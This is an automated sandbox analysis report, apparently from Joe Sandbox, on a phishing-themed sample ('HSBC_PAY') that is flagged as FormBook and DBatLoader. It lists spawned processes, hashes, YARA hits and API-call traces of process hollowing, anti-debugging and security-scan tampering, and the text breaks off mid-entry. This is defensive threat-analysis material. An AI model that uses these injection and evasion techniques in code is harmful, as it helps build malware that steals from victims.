                                                                  Start date:03/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:14:02:00
                                                                  Start date:03/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:14:02:01
                                                                  Start date:03/01/2025
                                                                  Path:C:\Users\Public\Libraries\uzonfntK.pif
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\Public\Libraries\uzonfntK.pif
                                                                  Imagebase:0x400000
                                                                  File size:175'800 bytes
                                                                  MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2140430291.00000000292F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 3%, ReversingLabs
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:14:02:14
                                                                  Start date:03/01/2025
                                                                  Path:C:\Users\Public\Libraries\Ktnfnozu.PIF
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\Public\Libraries\Ktnfnozu.PIF"
                                                                  Imagebase:0x400000
                                                                  File size:1'010'688 bytes
                                                                  MD5 hash:23B640CC7B2CFF45CEEF1C718E7095E0
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:Borland Delphi
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 50%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:14:02:15
                                                                  Start date:03/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:14:02:15
                                                                  Start date:03/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:8
                                                                  Start time:14:02:15
                                                                  Start date:03/01/2025
                                                                  Path:C:\Users\Public\Libraries\uzonfntK.pif
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\Public\Libraries\uzonfntK.pif
                                                                  Imagebase:0x400000
                                                                  File size:175'800 bytes
                                                                  MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000001.1848189708.0000000000F60000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2214229432.000000001E430000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000002.2197880197.0000000000F60000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2197880197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:11
                                                                  Start time:14:02:23
                                                                  Start date:03/01/2025
                                                                  Path:C:\Users\Public\Libraries\Ktnfnozu.PIF
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\Public\Libraries\Ktnfnozu.PIF"
                                                                  Imagebase:0x400000
                                                                  File size:1'010'688 bytes
                                                                  MD5 hash:23B640CC7B2CFF45CEEF1C718E7095E0
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:Borland Delphi
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:12
                                                                  Start time:14:02:24
                                                                  Start date:03/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:13
                                                                  Start time:14:02:24
                                                                  Start date:03/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:14
                                                                  Start time:14:02:24
                                                                  Start date:03/01/2025
                                                                  Path:C:\Users\Public\Libraries\uzonfntK.pif
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\Public\Libraries\uzonfntK.pif
                                                                  Imagebase:0x400000
                                                                  File size:175'800 bytes
                                                                  MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000E.00000002.2255713355.0000000000F60000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2255713355.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2280734227.0000000028280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000E.00000001.1938553898.0000000000F60000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:moderate
                                                                  Has exited:true


                                                                    Execution Graph

                                                                    Execution Coverage:15.2%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:10.3%
                                                                    Total number of Nodes:290
                                                                    Total number of Limit Nodes:16

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 02A9881C: LoadLibraryA.KERNEL32(00000000,00000000,02A98903), ref: 02A98850
                                                                      • Part of subcall function 02A9881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02A98903), ref: 02A98860
                                                                      • Part of subcall function 02A9881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02A98879
                                                                      • Part of subcall function 02A9881C: FreeLibrary.KERNEL32(74AE0000,00000000,02AE1388,Function_000065D8,00000004,02AE1398,02AE1388,000186A3,00000040,02AE139C,74AE0000,00000000,00000000,00000000,00000000,02A98903), ref: 02A988E3
                                                                      • Part of subcall function 02A985D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02A98660
                                                                    • GetThreadContext.KERNEL32(000008DC,02AE1420,ScanString,02AE13A4,02A9A774,UacInitialize,02AE13A4,02A9A774,ScanBuffer,02AE13A4,02A9A774,ScanBuffer,02AE13A4,02A9A774,UacInitialize,02AE13A4), ref: 02A9943A
                                                                      • Part of subcall function 02A9824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A982BD
                                                                      • Part of subcall function 02A984BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02A98521
                                                                      • Part of subcall function 02A979AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02A97A1F
                                                                      • Part of subcall function 02A97CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A97D6C
                                                                    • SetThreadContext.KERNEL32(000008DC,02AE1420,ScanBuffer,02AE13A4,02A9A774,ScanString,02AE13A4,02A9A774,Initialize,02AE13A4,02A9A774,000008E0,00363FF8,02AE14F8,00000004,02AE14FC), ref: 02A9A14F
                                                                    • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000008DC,00000000,000008DC,02AE1420,ScanBuffer,02AE13A4,02A9A774,ScanString,02AE13A4,02A9A774,Initialize,02AE13A4,02A9A774,000008E0,00363FF8,02AE14F8), ref: 02A9A15C
                                                                      • Part of subcall function 02A98798: LoadLibraryW.KERNEL32(bcrypt,?,000008DC,00000000,02AE13A4,02A9A3BF,ScanString,02AE13A4,02A9A774,ScanBuffer,02AE13A4,02A9A774,Initialize,02AE13A4,02A9A774,UacScan), ref: 02A987AC
                                                                      • Part of subcall function 02A98798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02A987C6
                                                                      • Part of subcall function 02A98798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008DC,00000000,02AE13A4,02A9A3BF,ScanString,02AE13A4,02A9A774,ScanBuffer,02AE13A4,02A9A774,Initialize), ref: 02A98802
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Library$MemoryThreadVirtual$AddressContextFreeLoadProc$AllocateCreateHandleModuleProcessReadResumeSectionUnmapUserViewWrite
                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                    • API String ID: 4083799063-51457883
                                                                    • Opcode ID: 33516f6e65cded3461d2f20c4e68caddcc5fbe72690de09d1b62a3b9acc1c150
                                                                    • Instruction ID: 6efe399194315eccffca84082978da37518bad6fb2951fd3fef6603b0b88c11d
                                                                    • Opcode Fuzzy Hash: 33516f6e65cded3461d2f20c4e68caddcc5fbe72690de09d1b62a3b9acc1c150
                                                                    • Instruction Fuzzy Hash: 7CE2EC35A9011ADFDF11FB65CE91ADE73FABF49310F1081A2A009AB215DE35EE468F50

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 02A9881C: LoadLibraryA.KERNEL32(00000000,00000000,02A98903), ref: 02A98850
                                                                      • Part of subcall function 02A9881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02A98903), ref: 02A98860
                                                                      • Part of subcall function 02A9881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02A98879
                                                                      • Part of subcall function 02A9881C: FreeLibrary.KERNEL32(74AE0000,00000000,02AE1388,Function_000065D8,00000004,02AE1398,02AE1388,000186A3,00000040,02AE139C,74AE0000,00000000,00000000,00000000,00000000,02A98903), ref: 02A988E3
                                                                      • Part of subcall function 02A985D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02A98660
                                                                    • GetThreadContext.KERNEL32(000008DC,02AE1420,ScanString,02AE13A4,02A9A774,UacInitialize,02AE13A4,02A9A774,ScanBuffer,02AE13A4,02A9A774,ScanBuffer,02AE13A4,02A9A774,UacInitialize,02AE13A4), ref: 02A9943A
                                                                      • Part of subcall function 02A9824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A982BD
                                                                      • Part of subcall function 02A984BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02A98521
                                                                      • Part of subcall function 02A979AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02A97A1F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryMemoryVirtual$AddressAllocateContextCreateFreeHandleLoadModuleProcProcessReadSectionThreadUnmapUserView
                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                    • API String ID: 2852987580-51457883
                                                                    • Opcode ID: 60fae6a3db88bdef597e976ab440b6c9dfb6bbe3c245abad1cb55d1eb232b61f
                                                                    • Instruction ID: 35605185f8e621e841f9696243018cc9fdb5c707f3a0d01e88be922d083c097f
                                                                    • Opcode Fuzzy Hash: 60fae6a3db88bdef597e976ab440b6c9dfb6bbe3c245abad1cb55d1eb232b61f
                                                                    • Instruction Fuzzy Hash: F4E2FC35A9011ADFDF11FB65CE91ADE73FABF49300F1081A2A009AB215DE35EE468F50

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02A80000,02AAD790), ref: 02A85A94
                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02A80000,02AAD790), ref: 02A85AB2
                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02A80000,02AAD790), ref: 02A85AD0
                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02A85AEE
                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02A85B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02A85B37
                                                                    • RegQueryValueExA.ADVAPI32(?,02A85CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02A85B7D,?,80000001), ref: 02A85B55
                                                                    • RegCloseKey.ADVAPI32(?,02A85B84,00000000,?,?,00000000,02A85B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02A85B77
                                                                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02A85B94
                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02A85BA1
                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02A85BA7
                                                                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02A85BD2
                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02A85C19
                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A85C29
                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02A85C51
                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A85C61
                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02A85C87
                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02A85C97
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                    • API String ID: 1759228003-2375825460
                                                                    • Opcode ID: 09ce26b4cd5d1d58c3c23f3ca6c0fe097a0b78327ba429e7fce3e10edc57d5d4
                                                                    • Instruction ID: f9ec4774bdc4debfbd112c81064785e1f75f3b95fe425d736c4730e6cfc94086
                                                                    • Opcode Fuzzy Hash: 09ce26b4cd5d1d58c3c23f3ca6c0fe097a0b78327ba429e7fce3e10edc57d5d4
                                                                    • Instruction Fuzzy Hash: D55174B1E4020C7EFB21E6E48D86FEFB7AD9B04744F8101A1AB04E6181EF749A448F61

                                                                    Control-flow Graph

                                                                    • Block 2a98798-2a987bd (LoadLibraryW) -> 2a987bf-2a987d7 (GetProcAddress) or 2a98807-2a9880d
                                                                    • Block 2a987bf-2a987d7 (GetProcAddress) -> 2a987d9-2a987f8 (call 2a97cf8) or 2a987fc-2a98802 (FreeLibrary)
                                                                    • Block 2a987d9-2a987f8 (call 2a97cf8) -> 2a987fc-2a98802 (FreeLibrary) or 2a987fa
                                                                    • Block 2a987fa -> 2a987fc-2a98802 (FreeLibrary)
                                                                    • Block 2a987fc-2a98802 (FreeLibrary) -> 2a98807-2a9880d
                                                                    APIs
                                                                    • LoadLibraryW.KERNEL32(bcrypt,?,000008DC,00000000,02AE13A4,02A9A3BF,ScanString,02AE13A4,02A9A774,ScanBuffer,02AE13A4,02A9A774,Initialize,02AE13A4,02A9A774,UacScan), ref: 02A987AC
                                                                    • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02A987C6
                                                                    • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008DC,00000000,02AE13A4,02A9A3BF,ScanString,02AE13A4,02A9A774,ScanBuffer,02AE13A4,02A9A774,Initialize), ref: 02A98802
                                                                      • Part of subcall function 02A97CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A97D6C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                    • String ID: BCryptVerifySignature$bcrypt
                                                                    • API String ID: 1002360270-4067648912
                                                                    • Opcode ID: 3b5b332417f022a8d578378084a8a5257969ef9c5b4de92755dbe9863a414d76
                                                                    • Instruction ID: 66e2aca84a99bc925bb6ac8a3496e658108067750619c21e10395eaa39035e7a
                                                                    • Opcode Fuzzy Hash: 3b5b332417f022a8d578378084a8a5257969ef9c5b4de92755dbe9863a414d76
                                                                    • Instruction Fuzzy Hash: B3F0A471AC0276EEEF90AB69A984B7637DCA381754F0009B9B10C8B944EF758C538B60

                                                                    Control-flow Graph

                                                                    • Block 2a9ebe8-2a9ec02 (GetModuleHandleW) -> 2a9ec04-2a9ec16 (GetProcAddress) or 2a9ec2e-2a9ec36
                                                                    • Block 2a9ec04-2a9ec16 (GetProcAddress) -> 2a9ec18-2a9ec28 (CheckRemoteDebuggerPresent) or 2a9ec2e-2a9ec36
                                                                    • Block 2a9ec18-2a9ec28 (CheckRemoteDebuggerPresent) -> 2a9ec2a or 2a9ec2e-2a9ec36
                                                                    • Block 2a9ec2a -> 2a9ec2e-2a9ec36
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(KernelBase), ref: 02A9EBF8
                                                                    • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02A9EC0A
                                                                    • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02A9EC21
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                    • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                    • API String ID: 35162468-539270669
                                                                    • Opcode ID: 139813649dbbf34cbed488e9e206074fda2d2c97e69c022fbe3d520c317a819a
                                                                    • Instruction ID: a0ef1d09218ca59f88764cc906bcc1f5bc67a8fc749b08569ef31a3988f21ed4
                                                                    • Opcode Fuzzy Hash: 139813649dbbf34cbed488e9e206074fda2d2c97e69c022fbe3d520c317a819a
                                                                    • Instruction Fuzzy Hash: 4BF0A73090424CBEEF12E7A98A887DDFBE95B05328F64079594A4711C2EF715640C691

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 02A84ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02A84EDA
                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A9DC78), ref: 02A9DBE3
                                                                    • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02A9DC78), ref: 02A9DC13
                                                                    • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02A9DC28
                                                                    • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02A9DC54
                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02A9DC5D
                                                                      • Part of subcall function 02A84C0C: SysFreeString.OLEAUT32(02A9E948), ref: 02A84C1A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                    • String ID:
                                                                    • API String ID: 1897104825-0
                                                                    • Opcode ID: 948e32f6d4f837fbf280c0e5f50d33b3f6543342388244289c1db1f7352f59a8
                                                                    • Instruction ID: 661705ee5df0a652d176168ca95dd1af1a66e74875ea38428e65b6d8de39c6c4
                                                                    • Opcode Fuzzy Hash: 948e32f6d4f837fbf280c0e5f50d33b3f6543342388244289c1db1f7352f59a8
                                                                    • Instruction Fuzzy Hash: B221C171A907097EEB11FAE5CD46FDE77BDAB09700F500461B700F7180DEB4AA458B55

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02A9E42E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
